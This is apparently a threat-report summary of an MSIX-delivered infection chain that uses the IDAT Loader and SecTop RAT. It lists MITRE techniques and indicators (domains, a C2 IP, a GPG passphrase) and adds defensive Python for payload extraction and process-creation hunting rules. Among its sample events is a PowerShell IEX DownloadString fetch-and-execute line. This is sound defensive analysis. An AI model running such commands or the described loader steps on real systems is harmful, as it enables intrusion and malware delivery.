Keypoints
- Victim downloaded a malicious MSIX (Room_Planner-x86.msix) from a typosquatted site, which dropped and executed a PowerShell script (1.ps1).
- The initial PowerShell staged communication with a Telegram bot, sending the host IP (via icanhazip[.]com) and retrieving further PowerShell code from the bot.
- The Telegram-delivered script generated a random folder name ($JAM), downloaded and GPG-decrypted cr.tar.gpg from read-holy-quran[.]group, extracted a RAR containing run.exe and a tampered wbxtrace.dll, and started run.exe to sideload the DLL.
- The corrupted wbxtrace.dll contained the IDAT Loader, which parsed Dharna.7z for 49 44 41 54 (IDAT) offsets to derive decryption keys and reveal the final encrypted payload.
- IDAT Loader used advanced evasion/injection techniques (Process Doppelgänging, Heaven's Gate, NtCreateSection/NtMapViewOfSection) to inject and load the final SecTop RAT into msbuild.exe.
- The chain also executed an AMSI bypass script (from Pastebin) via IEX and reflectively loaded a .NET binary downloaded as a JPG from kalpanastickerbindi[.]com/1.jpg.
- Persistence was achieved by creating a Startup .lnk pointing to run.exe; the decrypted payloads were staged and executed from C:\ProgramData\$JAM\cr, where $JAM is the random 8-character directory name generated by the script.
MITRE Techniques
- [T1059.001] Command and Scripting Interpreter: PowerShell — 1.ps1 is used to fingerprint the compromised machine and execute additional PowerShell scripts ("1.ps1 is used to fingerprint compromised machine and execute additional PowerShell scripts").
- [T1106] Native API — The IDAT injector and IDAT loader use the Heaven's Gate technique to evade detection ("The IDAT injector and IDAT loader are using Heaven's Gate technique to evade detection").
- [T1204.002] User Execution: Malicious File — Initial compromise occurs when the user executes the Room_Planner-x86.msix installer ("User executes the binary Room_Planner-x86.msix").
- [T1036.005] Masquerading: Match Legitimate Name or Location — The MSIX package impersonated the legitimate Room Planner installer to trick users ("Malicious MSIX masquerades as legitimate Room Planner installer").
- [T1140] Deobfuscate/Decode Files or Information — GPG is used to decrypt cr.tar.gpg to obtain the RAR containing the payload ("gpg.exe used to decrypt cr.tar.gpg").
- [T1574.001] Hijack Execution Flow: DLL Search Order Hijacking — run.exe loads a modified WebEx DLL (wbxtrace.dll) to execute malicious code ("run.exe loads a malicious wbxtrace.dll").
- [T1620] Reflective Code Loading — A .NET assembly is downloaded as an image from kalpanastickerbindi[.]com/1.jpg and reflectively loaded ("PowerShell script loads a binary hosted at kalpanastickerbindi[.]com/1.jpg").
- [T1055] Process Injection — The IDAT injector implements NtCreateSection + NtMapViewOfSection to inject code into cmd.exe ("IDAT injector implements NtCreateSection + NtMapViewOfSection Code Injection technique to inject into cmd.exe process").
- [T1055.013] Process Injection: Process Doppelgänging — The IDAT loader uses Process Doppelgänging to load SecTop RAT into a newly created process ("IDAT loader implements Process Doppelgänging technique to load the SecTop RAT").
- [T1497.003] Virtualization/Sandbox Evasion: Time Based Evasion — Multiple stages perform execution delays to hinder sandbox analysis ("Execution delays are performed by several stages throughout the attack flow").
Indicators of Compromise
- [File] Initial installer â Room_Planner-x86.msix (SHA256: 6f350e64d4efbe8e2953b39bfee1040c8b041f6f212e794214e1836561a30c23)
- [File] Dropped script â 1.ps1 (SHA256: 928bd805b924ebe43169ad6d670acb2dfe45722e17d461ff0394852b82862d23)
- [File] Malicious DLL and payload archive — wbxtrace.dll (SHA256: 1d0daf989cf28852342b1c0dfee05374860e1300106ff7788bba26d84549b845), Dharna.7z (SHA256: b7469153dc92bf5de9bf2521d9550df21bc4574d0d0cfc919ff26d1071c000b2)
- [Domain/URL] Hosted payloads and resources â read-holy-quran[.]group/ld/cr.tar.gpg, kalpanastickerbindi[.]com/1.jpg
- [IP] C2 communication â 91.215.85[.]66 (SecTop RAT callback)
Execution flow (technical procedure): The delivered MSIX installer dropped a PowerShell launcher (1.ps1) into the WindowsApps folder and ran it; that script used Invoke-RestMethod to fetch the host's public IP (icanhazip[.]com), sent the information to a Telegram bot, deleted the message, then retrieved and executed a second PowerShell stage hosted by the bot. The Telegram-stage script enumerated OS/domain/AV, generated an 8-character random name ($JAM), downloaded a GPG archive (read-holy-quran[.]group/ld/cr.tar.gpg) into %APPDATA%, decrypted it with the passphrase "riudswrk", saved the decrypted RAR into C:\ProgramData\$JAM\cr, and used tar to extract its contents.
Post-extraction, the script launched run.exe (a renamed WebEx binary) which loaded a tampered WebEx DLL (wbxtrace.dll). The modified DLL contained the IDAT Loader that read Dharna.7z, searched for the PNG IDAT marker (49 44 41 54) followed by C6 A5 79 EA, used the subsequent 4 bytes (E1 4E 91 99) as a decryption key, and decrypted embedded components and a final payload (which used a 200-byte XOR key). Additional stages fetched an AMSI-bypass PowerShell script (Pastebin) executed via IEX, reflectively loaded a .NET assembly downloaded as 1.jpg (kalpanastickerbindi[.]com/1.jpg), and created persistence by placing a .lnk in the Startup folder pointing to run.exe.
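The marker scan described above, as an added example (this is not Rapid7's extractor or the loader's own code). The page gives the scan rule: find the PNG chunk tag 49 44 41 54 ("IDAT") followed by C6 A5 79 EA and take the next 4 bytes as the key. Everything else here is an assumption made for the demo: that the bytes after the key are covered by a repeating XOR with that 4-byte key, and the layout of the constructed container used as input. A real PNG (or a 7z with an embedded PNG) contains many IDAT chunks, so the example checks every occurrence rather than stopping at the first tag.

```python
"""Locate the IDAT Loader key marker in a container and strip the key-derived XOR layer.

Added example, not the loader's or Rapid7's code. Facts from the report: the loader
scans for "IDAT" followed by C6 A5 79 EA and uses the next 4 bytes as a key.
Assumption: the data after the key is a repeating-key XOR with that key. The real
loader applies further stages the page does not detail; only the scan and this one
XOR step are shown here.
"""
from typing import Optional, Tuple

IDAT_TAG = b"\x49\x44\x41\x54"   # "IDAT" PNG chunk tag
IDAT_SIG = b"\xC6\xA5\x79\xEA"   # signature bytes the loader expects right after the tag
KEY_LEN = 4                      # key length taken from the report


def find_keyed_idat(blob: bytes) -> Optional[Tuple[int, bytes]]:
    """Return (marker_offset, key) for the IDAT tag that carries the signature.

    Every "IDAT" occurrence is examined; only the one followed by IDAT_SIG is the
    loader's marker, so ordinary PNG IDAT chunks earlier in the file are skipped.
    """
    pos = blob.find(IDAT_TAG)
    while pos != -1:
        sig_off = pos + len(IDAT_TAG)
        key_off = sig_off + len(IDAT_SIG)
        if blob[sig_off:key_off] == IDAT_SIG and len(blob) >= key_off + KEY_LEN:
            return pos, blob[key_off:key_off + KEY_LEN]
        pos = blob.find(IDAT_TAG, pos + 1)
    return None


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; XOR is its own inverse, so this both encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def extract_stage(blob: bytes) -> Optional[bytes]:
    """Decrypt everything after the key with that key (assumed layout, see module docstring)."""
    hit = find_keyed_idat(blob)
    if hit is None:
        return None
    marker_off, key = hit
    body = blob[marker_off + len(IDAT_TAG) + len(IDAT_SIG) + KEY_LEN:]
    return xor_repeating(body, key)


def build_sample_container(payload: bytes, key: bytes = bytes.fromhex("E14E9199")) -> bytes:
    """Constructed test input (not a real Dharna.7z): a 7z signature, a decoy IDAT
    chunk without the loader signature, then the real marker, signature, key and the
    XOR-encrypted payload. The default key is the value quoted in the report."""
    decoy_png_chunk = b"\x00\x00\x00\x10" + IDAT_TAG + b"\x78\x9c" + b"\x00" * 14
    return (b"7z\xbc\xaf\x27\x1c" + decoy_png_chunk
            + IDAT_TAG + IDAT_SIG + key + xor_repeating(payload, key))


if __name__ == "__main__":
    sample = build_sample_container(b"MZ\x90\x00 fake PE header for the demo")
    off, key = find_keyed_idat(sample)
    print(f"marker at offset 0x{off:x}, key {key.hex()}")
    print(extract_stage(sample))
```

When pointing this at a real sample, treat the XOR step as a starting point only: confirm the layout by checking that the output begins with a plausible structure (an MZ header, or a compressed stream) before trusting the rest of the extraction.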
Evasion and final-stage loading: The IDAT Loader employed Heaven's Gate (switching a 32-bit process into 64-bit code so native API calls bypass hooks placed on the 32-bit ntdll) and used section/mapping APIs (NtCreateSection / NtMapViewOfSection) to inject into cmd.exe, then used Process Doppelgänging to load the SecTop RAT into a spawned msbuild.exe process, avoiding AV/sandbox detection. Network IOCs included the SecTop RAT callback IP 91.215.85[.]66. Rapid7 released a configuration extractor to decrypt and recover the hidden payloads and configs for analysis.
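The process chain above (PowerShell fetching remote code via IEX, gpg.exe and tar.exe launched from PowerShell, run.exe executing from a random 8-character directory under ProgramData, msbuild.exe spawned by run.exe, and a Startup .lnk pointing into ProgramData) translates into hunting rules. The following is an added example, not Rapid7's detection content, run over constructed Sysmon-style process-creation records. The field names (parent, image, cmdline), the sample paths and user name, the gpg/tar command-line flags, and the allowlist of parents that normally launch MSBuild are assumptions made for the demo; the directory pattern, passphrase and parent/child relationships come from the report.

```python
"""Hunting rules for the MSIX -> PowerShell -> gpg/tar -> run.exe -> msbuild.exe chain.

Added example, not Rapid7's code. Events are constructed Sysmon-style process
creation records; field names, paths and tool flags are assumptions for the demo.
"""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# Parents that normally launch MSBuild.exe (assumed allowlist; tune per estate).
MSBUILD_EXPECTED_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe", "vbcscompiler.exe"}
# run.exe inside C:\ProgramData\<8 random chars>\cr\ as described in the report.
RANDOM_CR_DIR = re.compile(r"\\programdata\\[a-z0-9]{8}\\cr\\run\.exe$", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_powershell_remote_iex(e: Event) -> bool:
    c = e["cmdline"].lower()
    return (basename(e["image"]) == "powershell.exe"
            and re.search(r"\b(iex|invoke-expression)\b", c) is not None
            and any(s in c for s in ("pastebin.com", "downloadstring", "invoke-restmethod")))


def rule_gpg_child_of_powershell(e: Event) -> bool:
    return basename(e["image"]) == "gpg.exe" and basename(e["parent"]) == "powershell.exe"


def rule_tar_into_programdata(e: Event) -> bool:
    return basename(e["image"]) == "tar.exe" and "\\programdata\\" in e["cmdline"].lower()


def rule_run_exe_from_random_programdata_dir(e: Event) -> bool:
    return RANDOM_CR_DIR.search(e["image"]) is not None


def rule_msbuild_unusual_parent(e: Event) -> bool:
    return (basename(e["image"]) == "msbuild.exe"
            and basename(e["parent"]) not in MSBUILD_EXPECTED_PARENTS)


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("powershell_remote_iex", rule_powershell_remote_iex),
    ("gpg_child_of_powershell", rule_gpg_child_of_powershell),
    ("tar_into_programdata", rule_tar_into_programdata),
    ("run_exe_from_random_programdata_dir", rule_run_exe_from_random_programdata_dir),
    ("msbuild_unusual_parent", rule_msbuild_unusual_parent),
]


def evaluate(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event id, rule name) for every rule that fires on every event."""
    return [(ev["id"], name) for ev in events for name, fn in RULES if fn(ev)]


def startup_lnk_is_suspicious(target: str) -> bool:
    """A Startup .lnk whose target resolves under ProgramData, as the run.exe shortcut did."""
    return "\\programdata\\" in target.replace("/", "\\").lower()


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample telemetry (not real logs); the last two events are benign controls.
SAMPLE_EVENTS: List[Event] = [
    {"id": 1, "parent": PS, "image": PS,
     "cmdline": r"powershell.exe -nop -w hidden -c IEX((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/EXAMPLE'))"},
    {"id": 2, "parent": PS, "image": r"C:\Program Files (x86)\GnuPG\bin\gpg.exe",
     "cmdline": r"gpg.exe --batch --passphrase riudswrk -o C:\ProgramData\kq3jd8fa\cr\cr.tar -d C:\Users\alice\AppData\Roaming\cr.tar.gpg"},
    {"id": 3, "parent": PS, "image": r"C:\Windows\System32\tar.exe",
     "cmdline": r"tar -xf C:\ProgramData\kq3jd8fa\cr\cr.tar -C C:\ProgramData\kq3jd8fa\cr"},
    {"id": 4, "parent": PS, "image": r"C:\ProgramData\kq3jd8fa\cr\run.exe", "cmdline": "run.exe"},
    {"id": 5, "parent": r"C:\ProgramData\kq3jd8fa\cr\run.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", "cmdline": "MSBuild.exe"},
    {"id": 6, "parent": r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", "cmdline": "MSBuild.exe"},
    {"id": 7, "parent": r"C:\Windows\explorer.exe", "image": PS, "cmdline": "powershell.exe -c Get-ChildItem"},
]

if __name__ == "__main__":
    for event_id, rule in evaluate(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

Each rule is weak on its own (tar.exe writing to ProgramData, or MSBuild with an odd parent, both occur in benign software deployment); the value is in correlating several of them on one host within a short window, which is what the constructed events 1 through 5 show.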